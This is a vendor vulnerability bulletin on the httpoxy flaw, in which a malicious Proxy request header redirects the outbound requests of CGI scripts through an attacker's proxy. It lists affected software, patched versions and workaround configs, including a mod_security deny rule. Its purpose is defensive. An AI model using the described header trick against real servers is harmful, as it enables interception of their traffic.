The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a vigilance database and tools to fix them.

Vulnerability of Web servers: creating client queries via the Proxy header

Synthesis of the vulnerability 

An attacker can send a query with a malicious Proxy header to a web service hosting a CGI script creating web client queries, so they go through attacker's proxy.
Vulnerable software: Apache httpd, Tomcat, Mac OS X, Debian, Drupal Core, VNX Operating Environment, VNX Series, eZ Publish, Fedora, HP-UX, QRadar SIEM, Junos Space, NSM Central Manager, NSMXpress, lighttpd, IIS, nginx, openSUSE, openSUSE Leap, Oracle Communications, Solaris, Perl Module ~ not comprehensive, PHP, Python, RHEL, Slackware, SUSE Linux Enterprise Desktop, SLES, Synology DSM, Synology DS***, Synology RS***, TrendMicro ServerProtect, TYPO3 Core, Ubuntu, Varnish.
Severity of this announce: 3/4.
Number of vulnerabilities in this bulletin: 13.
Creation date: 18/07/2016.
Références of this computer vulnerability: 1117414, 1994719, 1994725, 1999671, APPLE-SA-2017-09-25-1, bulletinjul2017, bulletinoct2016, c05324759, CERTFR-2016-AVI-240, CERTFR-2017-AVI-012, CERTFR-2017-AVI-022, cpujan2018, CVE-2016-1000103-REJECT, CVE-2016-1000104, CVE-2016-1000105-REJECT, CVE-2016-1000107, CVE-2016-1000108, CVE-2016-1000109, CVE-2016-1000110, CVE-2016-1000111, CVE-2016-1000212, CVE-2016-5385, CVE-2016-5386, CVE-2016-5387, CVE-2016-5388, DLA-1883-1, DLA-553-1, DLA-568-1, DLA-583-1, DLA-749-1, DRUPAL-SA-CORE-2016-003, DSA-2019-131, DSA-3623-1, DSA-3631-1, DSA-3642-1, EZSA-2016-001, FEDORA-2016-07e9059072, FEDORA-2016-2c324d0670, FEDORA-2016-340e361b90, FEDORA-2016-4094bd4ad6, FEDORA-2016-4e7db3d437, FEDORA-2016-604616dc33, FEDORA-2016-683d0b257b, FEDORA-2016-970edb82d4, FEDORA-2016-9c8cf5912c, FEDORA-2016-9de7253cc7, FEDORA-2016-9fd814a7f2, FEDORA-2016-9fd9bfab9e, FEDORA-2016-a29c65b00f, FEDORA-2016-aef8a45afe, FEDORA-2016-c1b01b9278, FEDORA-2016-df0726ae26, FEDORA-2016-e2c8f5f95a, FEDORA-2016-ea5e284d34, HPSBUX03665, HT207615, HT208144, HT208221, httpoxy, JSA10770, JSA10774, openSUSE-SU-2016:1824-1, openSUSE-SU-2016:2054-1, openSUSE-SU-2016:2055-1, openSUSE-SU-2016:2115-1, openSUSE-SU-2016:2120-1, openSUSE-SU-2016:2252-1, openSUSE-SU-2016:2536-1, openSUSE-SU-2016:3092-1, openSUSE-SU-2016:3157-1, openSUSE-SU-2017:0223-1, openSUSE-SU-2020:0086-1, RHSA-2016:1420-01, RHSA-2016:1421-01, RHSA-2016:1422-01, RHSA-2016:1538-01, RHSA-2016:1609-01, RHSA-2016:1610-01, RHSA-2016:1611-01, RHSA-2016:1612-01, RHSA-2016:1613-01, RHSA-2016:1624-01, RHSA-2016:1626-01, RHSA-2016:1627-01, RHSA-2016:1628-01, RHSA-2016:1629-01, RHSA-2016:1630-01, RHSA-2016:1635-01, RHSA-2016:1636-01, RHSA-2016:1648-01, RHSA-2016:1649-01, RHSA-2016:1650-01, RHSA-2016:1978-01, RHSA-2016:2045-01, RHSA-2016:2046-01, SSA:2016-203-02, SSA:2016-358-01, SSA:2016-363-01, SUSE-SU-2017:1632-1, SUSE-SU-2017:1660-1, SUSE-SU-2019:0223-1, SUSE-SU-2020:0114-1, SUSE-SU-2020:0234-1, USN-3038-1, USN-3045-1, USN-3134-1, USN-3177-1, USN-3177-2, USN-3585-1, VIGILANCE-VUL-20143, VU#797896.

Description of the vulnerability 

Most web servers support CGI scripts (PHP, Python, etc.).

According to the RFC 3875, when a web server receives a Proxy header, it has to create the HTTP_PROXY environment variable for CGI scripts.

However, this variable is also used to store the name of the proxy that web clients has to use. The PHP (via Guzzle, Artax, etc.) and Python scripts will thus use the proxy indicated in the web query for all client queries they will send during the CGI session.

An attacker can therefore send a query with a malicious Proxy header to a web service hosting a CGI script creating web client queries, so they go through attacker's proxy.
Full bulletin, software filtering, emails, fixes, ... (Request your free trial)

This computer vulnerability alert impacts software or systems such as Apache httpd, Tomcat, Mac OS X, Debian, Drupal Core, VNX Operating Environment, VNX Series, eZ Publish, Fedora, HP-UX, QRadar SIEM, Junos Space, NSM Central Manager, NSMXpress, lighttpd, IIS, nginx, openSUSE, openSUSE Leap, Oracle Communications, Solaris, Perl Module ~ not comprehensive, PHP, Python, RHEL, Slackware, SUSE Linux Enterprise Desktop, SLES, Synology DSM, Synology DS***, Synology RS***, TrendMicro ServerProtect, TYPO3 Core, Ubuntu, Varnish.

Our Vigil@nce team determined that the severity of this computer threat alert is important.

The trust level is of type confirmed by the editor, with an origin of internet client.

This bulletin is about 13 vulnerabilities.

A proof of concept or an attack tool is available, so your teams have to process this alert. An attacker with a technician ability can exploit this security vulnerability.

Solutions for this threat 

Apache httpd: workaround for httpoxy.
Apache httpd is vulnerable only if it uses a CGI framework (PHP, mod_fcgid, mod_perl, etc.).
A workaround is to add in httpd.conf:
  LoadModule headers_module {path-to}/mod_headers.so
  RequestHeader unset Proxy early
A workaround is to add in mod_security:
  SecRuleEngine On
  SecRule &REQUEST_HEADERS:Proxy "@gt 0" "id:1000005,log,deny,msg:'httpoxy denied'"

Apache Tomcat: version 8.5.5.
The version 8.5.5 is fixed:
  http://tomcat.apache.org/download-80.cgi

Apache Tomcat: version 8.0.37.
The version 8.0.37 is fixed:
  http://tomcat.apache.org/download-80.cgi

Apache Tomcat: version 7.0.72.
The version 7.0.72 is fixed:
  http://tomcat.apache.org/

Apache Tomcat: version 6.0.47.
The version 6.0.47 is fixed:
  http://tomcat.apache.org/download-60.cgi

Apache Tomcat: workaround for httpoxy.
Apache Tomcat is vulnerable only if it uses a CGI framework (PHP, etc.).
A workaround is indicated in the information source.

Apache httpd: version 2.4.25.
The version 2.4.25 is fixed:
  http://apache.mediamirrors.org//httpd/httpd-2.4.25.tar.bz2

Apple macOS 10.12: version Security Update 2017-001.
The version Security Update 2017-001 is fixed:
  https://support.apple.com/

Apple macOS: version 10.13.
The version 10.13 is fixed:
  https://www.apple.com/support/downloads/

Apple macOS: version 10.13.1.
The version 10.13.1 is fixed:
  https://support.apple.com/

Apple MacOS X 10.11: version Security Update 2017-004.
The version Security Update 2017-004 is fixed:
  https://support.apple.com/

Apple Mac OS X: version 10.12.4.
The version 10.12.4 is fixed.

Debian 7: new php5 packages.
New packages are available:
  Debian 7: php5 5.4.45-0+deb7u6

Debian 7: new wordpress packages (01/08/2016).
New packages are available:
  Debian 7: wordpress 3.6.1+dfsg-1~deb7u11

Debian 8: new php5 packages.
New packages are available:
  Debian 8: php5 5.6.24+dfsg-0+deb8u1

Debian 8: new tomcat8 packages.
New packages are available:
  Debian 8: tomcat8 8.0.14-1+deb8u15

Debian: new apache2 packages.
New packages are available:
  Debian 7: apache2 2.2.22-13+deb7u7
  Debian 8: apache2 2.4.10-10+deb8u5

Debian: new lighttpd packages.
New packages are available:
  Debian 7: lighttpd 1.4.31-4+deb7u5
  Debian 8: lighttpd 1.4.35-4+deb8u1

Dell EMC VNXe3200: version 3.1.10.9946299.
The version 3.1.10.9946299 is fixed:
  https://www.dell.com/

Drupal Core: version 8.1.7.
The version 8.1.7 is fixed:
  https://www.drupal.org/project/drupal/releases/8.1.7

eZ Publish: solution for GuzzleHttp.
GuzzleHttp has to be updated with:
  php -d memory_limit=-1 composer.phar update

Fedora 23: new python packages.
New packages are available:
  Fedora 23: python 2.7.11-8.fc23

Fedora 24: new python packages.
New packages are available:
  Fedora 24: python 2.7.12-2.fc24

Fedora: new golang packages.
New packages are available:
  Fedora 23: golang 1.5.4-2.fc23
  Fedora 24: golang 1.6.3-1.fc24

Fedora: new httpd packages.
New packages are available:
  Fedora 23: httpd 2.4.23-4.fc23
  Fedora 24: httpd 2.4.23-4.fc24

Fedora: new lighttpd packages.
New packages are available:
  Fedora 23: lighttpd 1.4.41-1.fc23
  Fedora 24: lighttpd 1.4.41-1.fc24

Fedora: new perl-CGI-Emulate-PSGI packages.
New packages are available:
  Fedora 23: perl-CGI-Emulate-PSGI 0.22-1.fc23
  Fedora 24: perl-CGI-Emulate-PSGI 0.22-1.fc24

Fedora: new php-guzzlehttp-guzzle6 packages.
New packages are available:
  Fedora 23: php-guzzlehttp-guzzle6 6.2.1-1.fc23
  Fedora 24: php-guzzlehttp-guzzle6 6.2.1-1.fc24

Fedora: new php-guzzlehttp-guzzle packages.
New packages are available:
  Fedora 23: php-guzzlehttp-guzzle 5.3.1-1.fc23
  Fedora 24: php-guzzlehttp-guzzle 5.3.1-1.fc24

Fedora: new python3 packages.
New packages are available:
  Fedora 23: python3 3.4.3-12.fc23
  Fedora 24: python3 3.5.1-13.fc24

Fedora: new tomcat packages.
New packages are available:
  Fedora 23: tomcat 8.0.38-1.fc23
  Fedora 24: tomcat 8.0.38-1.fc24

HP-UX Tomcat: version 7.0.70.01.
The version 7.0.70.01 is fixed:
  https://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumber=HPUXWSATW501

IBM Cognos Business Intelligence: solution.
The solution is indicated in information sources.

IBM QRadar SIEM: patch.
A patch is indicated in information sources.

Juniper NSM Appliance: patch for Upgrade Package v3.
A patch is available:
  http://www.juniper.net/support/downloads/?p=nsm#sw

Junos Space: version 16.1R1.
The version 16.1R1 is fixed:
  https://www.juniper.net/

lighttpd: version 1.4.41.
The version 1.4.41 is fixed:
  http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.41.tar.gz

Microsoft IIS: workaround for httpoxy.
Microsoft IIS is vulnerable only if it uses a CGI framework (PHP, etc.).
A workaround is to add a rule in apphost.config:
  <system.webServer>
    <rewrite>
        <rules>
         <rule name="Erase HTTP_PROXY" patternSyntax="Wildcard">
         <match url="*.*" />
         <serverVariables>
         <set name="HTTP_PROXY" value="" />
         </serverVariables>
         <action type="None" />
         </rule>
        </rules>
    </rewrite>
  </system.webServer>

Nginx: workaround for httpoxy.
Nginx is vulnerable only if it uses a CGI/FastCGI framework (PHP, etc.).
A workaround is to add in the configuration of Nginx/FastCGI:
  fastcgi_param HTTP_PROXY "";
A workaround is to add in the configuration of proxy_pass:
  proxy_set_header Proxy "";

openSUSE Leap 15.1: new python3 packages (22/01/2020).
New packages are available:
  openSUSE Leap 15.1: python3 3.6.10-lp151.6.7.1

openSUSE Leap 42.1: new squid packages.
New packages are available:
  openSUSE Leap 42.1: squid 3.3.14-12.1

openSUSE Leap 42.1: new tomcat packages.
New packages are available:
  openSUSE Leap 42.1: tomcat 8.0.32-8.1

openSUSE Leap: new php7 packages.
New packages are available:
  openSUSE Leap 42.2: php7 7.0.7-6.2, apache2-mod_php7 7.0.7-6.2

openSUSE: new apache2-mod_fcgid packages.
New packages are available:
  openSUSE 13.2: apache2-mod_fcgid 2.3.9-2.5.1
  openSUSE Leap 42.1: apache2-mod_fcgid 2.3.9-7.1

openSUSE: new apache2 packages.
New packages are available:
  openSUSE 13.2: apache2 2.4.10-31.1
  openSUSE Leap 42.1: apache2 2.4.16-12.1

openSUSE: new python3 packages.
New packages are available:
  openSUSE 13.2: python3 3.4.5-4.4.1
  openSUSE Leap 42.1: python3 3.4.5-8.1

openSUSE: new python-Twisted packages.
New packages are available:
  openSUSE Leap 42.1: python-Twisted 15.4.0-3.1

Oracle Communications: CPU of January 2018.
A Critical Patch Update is available:
  http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

Oracle Solaris: patch for third party software of July 2017 v1.
A patch is available:
  https://support.oracle.com/rs?type=doc&id=1448883.1

Perl CGI-Emulate-PSGI: version 0.22.
The version 0.22 is fixed:
  http://search.cpan.org/dist/CGI-Emulate-PSGI/lib/CGI/Emulate/PSGI.pm

Red Hat JBoss Web Server: version 2.1.1.
The version 2.1.1 is fixed:
  https://access.redhat.com/documentation/en-US/Red_Hat_JBoss_Web_Server/2.1/html/2.1.1_Release_Notes/index.html

Red Hat JBoss Web Server: version 3.0.3 Service Pack 1.
The version 3.0.3 Service Pack 1 is fixed:
  https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=3.0.3

RHEL 6.8: new php packages.
New packages are available:
  RHEL 6: php 5.3.3-48.el6_8

RHEL 6.8: new tomcat6 packages.
New packages are available:
  RHEL 6: tomcat6 6.0.24-98.el6_8

RHEL 7.2: new golang packages.
New packages are available:
  RHEL 7: golang 1.6.3-1.el7_2.1

RHEL 7.2: new php packages.
New packages are available:
  RHEL 7: php 5.4.16-36.3.el7_2

RHEL 7.2: new tomcat packages.
New packages are available:
  RHEL 7: tomcat 7.0.54-8.el7_2

RHEL 7: new rh-python35-python packages.
New packages are available:
  RHEL 7: rh-python35-python 3.5.1-9.el7

RHEL: new httpd24-httpd packages.
New packages are available:
  RHEL 6: httpd24-httpd 2.4.18-11.el6
  RHEL 7: httpd24-httpd 2.4.18-11.el7

RHEL: new httpd packages.
New packages are available:
  RHEL 5: httpd 2.2.3-92.el5_11
  RHEL 6: httpd 2.2.15-54.el6_8
  RHEL 7: httpd 2.4.6-40.el7_2.4

RHEL: new php54-php packages.
New packages are available:
  RHEL 6: php54-php 5.4.40-4.el6
  RHEL 7: php54-php 5.4.40-4.el7

RHEL: new php55-php packages.
New packages are available:
  RHEL 6: php55-php 5.5.21-5.el6
  RHEL 7: php55-php 5.5.21-5.el7

RHEL: new python27-python packages.
New packages are available:
  RHEL 6: python27-python 2.7.8-18.el6
  RHEL 7: python27-python 2.7.8-16.el7

RHEL: new python33-python packages.
New packages are available:
  RHEL 6: python33-python 3.3.2-18.el6
  RHEL 7: python33-python 3.3.2-16.el7

RHEL: new python packages.
New packages are available:
  RHEL 6: python 2.6.6-66.el6_8
  RHEL 7: python 2.7.5-38.el7_2

RHEL: new python-twisted-web packages.
New packages are available:
  RHEL 6: python-twisted-web 8.2.0-5.el6_8
  RHEL 7: python-twisted-web 12.1.0-5.el7_2

RHEL: new rh-php56-php packages.
New packages are available:
  RHEL 6: rh-php56-php 5.6.5-9.el6
  RHEL 7: rh-php56-php 5.6.5-9.el7

RHEL: new rh-python34-python packages.
New packages are available:
  RHEL 6: rh-python34-python 3.4.2-14.el6

Slackware: new httpd packages.
New packages are available:
  Slackware 14.0: httpd 2.4.25-*-1_slack14.0
  Slackware 14.1: httpd 2.4.25-*-1_slack14.1
  Slackware 14.2: httpd 2.4.25-*-1_slack14.2

Slackware: new php packages.
New packages are available:
  Slackware 14.0: php 5.6.24-*-1_slack14.0
  Slackware 14.1: php 5.6.24-*-1_slack14.1
  Slackware 14.2: php 5.6.24-*-1_slack14.2

Slackware: new python packages.
New packages are available:
  Slackware 14.0: python 2.7.13-*-1_slack14.0
  Slackware 14.1: python 2.7.13-*-1_slack14.1
  Slackware 14.2: python 2.7.13-*-1_slack14.2

Solaris: patch for third party software of October 2016 v1.
A patch is available:
  https://support.oracle.com/rs?type=doc&id=1448883.1

Solaris: patch for third party software of October 2016 v2.
A patch is available:
  https://support.oracle.com/rs?type=doc&id=1448883.1

SUSE LE 11: new tomcat6 packages.
New packages are available:
  SUSE LE 11 SP3: tomcat6 6.0.53-0.56.1
  SUSE LE 11 SP4: tomcat6 6.0.53-0.56.1

SUSE LE 12: new go1.4 packages.
New packages are available:
  SUSE LE 12 RTM/SP1: go1.4 1.4.3-6.1

SUSE LE 12 RTM: new python packages.
New packages are available:
  SUSE LE 12 RTM: python 2.7.9-16.7.1

SUSE LE 12 RTM: new tomcat packages.
New packages are available:
  SUSE LE 12 RTM: tomcat 7.0.78-7.13.4

SUSE LE 15: new python3 packages (16/01/2020).
New packages are available:
  SUSE LE 15 RTM: python3 3.6.10-3.42.2
  SUSE LE 15 SP1: python3 3.6.10-3.42.2

SUSE LE 15: new python packages (27/01/2020).
New packages are available:
  SUSE LE 15 RTM: python 2.7.17-7.32.2
  SUSE LE 15 SP1: python 2.7.17-7.32.2

SUSE: new go packages.
New packages are available:
  openSUSE 13.2: go 1.4.3-18.1
  openSUSE Leap 42.1: go 1.6.2-21.1
  SUSE LE 12 RTM: go 1.6.1-6.1

Synology DS/RS: workaround for HTTPoxy.
A workaround is indicated in the information source.

Trend Micro ServerProtect: version 3.0.1531.
The version 3.0.1531 is fixed:
  http://files.trendmicro.com/products/splx/product%20patch/splx_30_lx_en_criticalpatch1531.tar.gz

TYPO3 Core: version 8.2.1.
The version 8.2.1 is fixed:
  https://typo3.org/download/

Ubuntu: new apache2 packages.
New packages are available:
  Ubuntu 16.04 LTS: apache2-bin 2.4.18-2ubuntu3.1
  Ubuntu 15.10: apache2-bin 2.4.12-2ubuntu2.1
  Ubuntu 14.04 LTS: apache2.2-bin 2.4.7-1ubuntu4.13
  Ubuntu 12.04 LTS: apache2.2-bin 2.2.22-1ubuntu1.11

Ubuntu: new php packages (03/08/2016).
New packages are available:
  Ubuntu 16.04 LTS: libapache2-mod-php7.0 7.0.8-0ubuntu0.16.04.2, php 7.0.8-0ubuntu0.16.04.2
  Ubuntu 14.04 LTS: libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.19, php 5.5.9+dfsg-1ubuntu4.19
  Ubuntu 12.04 LTS: libapache2-mod-php5 5.3.10-1ubuntu3.24, php 5.3.10-1ubuntu3.24

Ubuntu: new python packages.
New packages are available:
  Ubuntu 16.04 LTS: python2.7 2.7.12-1ubuntu0~16.04.1, python3.5 3.5.2-2ubuntu0~16.04.1
  Ubuntu 14.04 LTS: python2.7 2.7.6-8ubuntu0.3, python3.4 3.4.3-1ubuntu1~14.04.5
  Ubuntu 12.04 LTS: python2.7 2.7.3-0ubuntu3.9, python3.2 3.2.3-0ubuntu3.8

Ubuntu: new python-twisted packages.
New packages are available:
  Ubuntu 16.04 LTS: python-twisted 16.0.0-1ubuntu0.2
  Ubuntu 14.04 LTS: python-twisted 13.2.0-1ubuntu1.2

Ubuntu: new tomcat packages.
New packages are available:
  Ubuntu 16.10: tomcat8 8.0.37-1ubuntu0.1
  Ubuntu 16.04 LTS: tomcat8 8.0.32-1ubuntu1.3
  Ubuntu 14.04 LTS: tomcat7 7.0.52-1ubuntu0.9
  Ubuntu 12.04 LTS: tomcat6 6.0.35-1ubuntu3.10

Varnish: workaround for httpoxy.
A workaround is to add in the configuration:
  sub vcl_recv {
    [...]
    unset req.http.proxy;
    [...]
  }
Full bulletin, software filtering, emails, fixes, ... (Request your free trial)

Computer vulnerabilities tracking service 

Vigil@nce provides a software vulnerabilities bulletin. The Vigil@nce team tracks computer vulnerabilities impacting systems and applications.